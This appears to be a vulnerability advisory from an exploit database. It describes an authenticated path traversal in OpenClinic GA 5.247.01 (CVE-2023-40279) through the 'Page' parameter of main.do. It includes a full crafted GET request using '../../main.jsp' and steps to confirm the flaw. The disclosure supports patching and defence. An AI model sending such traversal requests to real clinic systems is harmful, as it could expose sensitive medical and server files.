OpenClinic GA 5.247.01 Path Traversal (Authenticated)

2024.04.15
Credit: V. B.
Risk: High
Local: No
Remote: Yes
CWE: CWE-22

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated) # Date: 2023-08-14 # Exploit Author: V. B. # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40279 # Details An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories. # Proof of Concept (POC) Steps to Reproduce: - Crafting the Malicious GET Request: - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite. - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`): GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1 Host: 192.168.100.5:10088 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Connection: close Cookie: JSESSIONID=[SESSION ID] Cache-Control: max-age=0 2. Confirming the Vulnerability: - Send the crafted GET request to the target server. - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability. - This vulnerability can lead to sensitive information disclosure or more severe attacks.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top